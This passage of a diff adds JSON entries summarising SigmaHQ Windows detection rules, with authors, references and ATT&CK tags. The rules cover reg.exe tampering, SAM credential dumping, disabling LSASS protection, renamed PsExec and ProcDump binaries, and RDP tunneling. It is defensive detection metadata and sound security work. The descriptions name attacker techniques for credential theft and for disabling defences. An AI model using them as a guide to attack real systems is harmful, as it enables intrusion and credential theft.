Often used by attacker to prevent safeboot execution of security products", + "meta": { + "author": "Nasreddine Bencherchali, Tim Shelton", + "creation_date": "2022/08/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_reg_delete_safeboot.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "value": "Delete SafeBoot Keys Via Reg Utility" + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_reg_delete_services.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "value": "Delete Services Via Reg Utility" + }, + { + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + 
"filename": "proc_creation_win_reg_dump_sam.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dump_sam.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e", + "value": "Registry Dump of SAM Creds and Secrets" + }, + { + "description": "Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' subkeys", + "meta": { + "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", + "creation_date": "2022/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_reg_enable_rdp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" + ] + }, + "uuid": "0d5675be-bc88-4172-86d3-1e96a4476536", + "value": "Enabling RDP Service via Reg.exe" + }, + { + "description": "Detects the import of the '.reg' files from suspicious paths using the 'reg.exe' utility", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Legitimate import of keys" + ], + "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml", + "level": "medium", + "logsource.category": "process_creation", 
+ "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97", + "value": "Imports Registry Key From a File Using Reg.exe" + }, + { + "description": "Detects reg command lines that disables PPL on the LSA process", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_reg_lsass_ppl.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsass_ppl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.010" + ] + }, + "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "value": "Registry Disabling LSASS PPL" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_reg_service_imagepath_change.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.011" + ] + }, + "uuid": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", + "value": "Service ImagePath Change with Reg.exe" + }, + { + "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_remote_desktop_tunneling.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_desktop_tunneling.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ] + }, + "uuid": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "value": "Potential Remote Desktop Tunneling" + }, + { + "description": "Detects the desktopimgdownldr utility being used to download a remote file. 
An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_remote_file_download_desktopimgdownldr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_file_download_desktopimgdownldr.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e", + "value": "Remote File Download via Desktopimgdownldr Utility" + }, + { + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." + ], + "filename": "proc_creation_win_remote_powershell_session_process.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_powershell_session_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1021.006" + ] + }, + "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", + "value": "Remote PowerShell Session Host Process (WinRM)" + }, + { + "description": "Identifies use of various commands to query a systems time. 
This technique may be used before executing a scheduled task or to discover the time zone of a target system.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of the system utilities to discover system time for legitimate reason" + ], + "filename": "proc_creation_win_remote_time_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1124" + ] + }, + "uuid": "b243b280-65fe-48df-ba07-6ddea7646427", + "value": "Discovery of a System Time" + }, + { + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", + "meta": { + "author": "frack113", + "creation_date": "2021/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_remove_windows_defender_definition_files.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "9719a8aa-401c-41af-8108-ced7ec9cd75c", + 
"value": "Remove Windows Defender Definition Files" + }, + { + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "meta": { + "author": "Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)", + "creation_date": "2019/06/15", + "falsepositive": [ + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + ], + "filename": "proc_creation_win_renamed_binary.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1036/", + "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "value": "Renamed Binary" + }, + { + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "meta": { + "author": "Matthew Green - @mgreen27, Florian Roth", + "creation_date": "2019/06/15", + "falsepositive": [ + "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist" + ], + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1036/", + "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "value": "Highly Relevant Renamed Binary" + }, + { + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/06/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_browsercore.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mariuszbit/status/1531631015139102720", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml" + ], + "tags": [ + "attack.t1528", + "attack.t1036.003" + ] + }, + "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "value": "Process Creation with Renamed BrowserCore.exe" + }, + { + "description": "Detects execution of renamed ftp.exe binary based on OriginalFileName field", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_ftp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c", + "value": "Renamed FTP.EXE Binary Execution" + }, + { + "description": "Detects renamed jusched.exe used by cobalt group", + "meta": { + "author": "Markus Neis, Swisscom", + "creation_date": "2019/06/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_jusched.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "value": "Renamed jusched.exe" + }, + { + "description": "Detects execution of a renamed version of the \"Mavinject\" process. 
Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_renamed_mavinject.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" + ] + }, + "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "value": "Rename Mavinject Execution" + }, + { + "description": "Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/22", + "falsepositive": [ + "Software that illegaly integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" + ], + "filename": "proc_creation_win_renamed_megasync.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": 
"windows", + "refs": [ + "https://redcanary.com/blog/rclone-mega-extortion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "value": "Renamed MegaSync" + }, + { + "description": "Detects process creation with a renamed Msdt.exe", + "meta": { + "author": "pH-T", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_renamed_msdt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "value": "Renamed Msdt.exe" + }, + { + "description": "Detects execution of renamed client32.exe (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_netsupport_rat.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "0afbd410-de03-4078-8491-f132303cb67d", + "value": "Execution of Renamed NetSupport RAT" + }, + { + "description": "Detects execution of renamed paexec via imphash and executable product string", + "meta": { + "author": "Jason Lynch", + "creation_date": "2019/04/17", + "falsepositive": [ + "Unknown 
imphashes" + ], + "filename": "proc_creation_win_renamed_paexec.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003", + "attack.g0046", + "car.2013-05-009", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", + "value": "Execution of Renamed PaExec" + }, + { + "description": "Execution of a renamed version of the Plink binary", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_plink.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "value": "Execution Of Renamed Plink Binary" + }, + { + "description": "Detects the execution of a renamed PowerShell often used by attackers or malware", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2019/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_powershell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://twitter.com/christophetd/status/1164506034720952320", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_powershell.yml" + ], + "tags": [ + "car.2013-05-009", + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20", + "value": "Renamed PowerShell" + }, + { + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/18", + "falsepositive": [ + "Procdump illegaly bundled with legitimate software", + "Weird admins who renamed binaries (and should be investigated)" + ], + "filename": "proc_creation_win_renamed_procdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/procdump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "value": "Renamed ProcDump" + }, + { + "description": "Detects the execution of a renamed PsExec often used by attackers or malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/05/21", + "falsepositive": [ + "Software that illegaly integrates PsExec in a renamed form", + "Administrators that have renamed PsExec and no one knows why" + ], + "filename": "proc_creation_win_renamed_psexec.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_psexec.yml" + ], + "tags": [ + 
"car.2013-05-009", + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2", + "value": "Renamed PsExec" + }, + { + "description": "Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_rundll32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32.yml" + ], + "tags": "No established tags" + }, + "uuid": "d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2", + "value": "Renamed Rundll32.exe Execution" + }, + { + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/22",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
+ "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed",
+ "value": "DllRegisterServer Call From Non Rundll32"
+ },
+ {
+ "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/09/19",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_renamed_rurat.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://redcanary.com/blog/misbehaving-rats/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.collection",
+ "attack.command_and_control",
+ "attack.discovery",
+ "attack.s0592"
+ ]
+ },
+ "uuid": "9ef27c24-4903-4192-881a-3adde7ff92a5",
+ "value": "Execution of Renamed Remote Utilities RAT (RURAT)"
+ },
+ {
+ "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/09/06",
+ "falsepositive": [
+ "System administrator usage"
+ ],
+ "filename": "proc_creation_win_renamed_sdelete.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1485"
+ ]
+ },
+ "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90",
+ "value": "Renamed Sysinternals Sdelete Usage"
+ },
+ {
+ "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading",
+ "meta": {
+ "author": "elhoim",
+ "creation_date": "2022/09/09",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_renamed_vmnat.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/malmoeb/status/1525901219247845376",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1574.002"
+ ]
+ },
+ "uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205",
+ "value": "Renamed or Portable Vmnat.exe"
+ },
+ {
+ "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/08/12",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_renamed_whoami.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/",
+ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1033",
+ "car.2016-03-001"
+ ]
+ },
+ "uuid": "f1086bf7-a0c4-4a37-9102-01e573caf4a0",
+ "value": "Renamed Whoami Execution"
+ },
+ {
+ "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.",
+ "meta": {
+ "author": "oscd.community, @redcanary, Zach Stanford @svch0st",
+ "creation_date": "2020/10/10",
+ "falsepositive": [
+ "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP"
+ ],
+ "filename": "proc_creation_win_root_certificate_installed.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_root_certificate_installed.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1553.004"
+ ]
+ },
+ "uuid": "46591fae-7a4c-46ea-aec3-dff5e6d785dc",
+ "value": "Root Certificate Installed"
+ },
+ {
+ "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/04/13",
+ "falsepositive": [
+ "Unknown",
+ "Some cases in which the service spawned a werfault.exe process"
+ ],
+ "filename": "proc_creation_win_rpcss_anomalies.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809",
+ "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html",
+ "https://twitter.com/cyb3rops/status/1514217991034097664",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1190",
+ "attack.execution",
+ "attack.t1569.002"
+ ]
+ },
+ "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16",
+ "value": "Remote Procedure Call Service Anomaly"
+ },
+ {
+ "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.",
+ "meta": {
+ "author": "CD_ROM_",
+ "creation_date": "2022/05/21",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_rundll32_parent_explorer.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://redcanary.com/blog/raspberry-robin/",
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713",
+ "value": "Rundll32 With Suspicious Parent Process"
+ },
+ {
+ "description": "load malicious registered COM objects",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/02/13",
+ "falsepositive": [
+ "Legitimate use"
+ ],
